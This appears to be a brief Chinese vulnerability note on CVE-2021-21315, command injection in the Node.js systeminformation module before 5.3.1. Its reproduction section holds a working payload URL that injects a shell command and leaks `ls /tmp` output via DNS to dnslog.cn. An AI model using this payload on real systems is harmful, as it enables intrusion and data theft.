CVE-2021-21315
漏洞描述:Node.js-systeminformation是用于获取各种系统信息的Node.js模块,在存在命令注入漏洞的版本中,攻击者可以通过未过滤的参数中注入payload执行系统命令。
影响版本:Systeminformation < 5.3.1
参考资料:
●https://zhuanlan.zhihu.com/p/399093871
●https://toutiao.io/posts/zsj75t8/preview
●https://icode.best/i/73304343082095
漏洞复现
●http://123.58.224.8:49952/api/getServices?name[]=$(ping%20`ls%20/tmp`.6ovntk.dnslog.cn)
© 版权声明
部分文章采集于互联网,若侵权请联系删除!
THE END
请登录后查看评论内容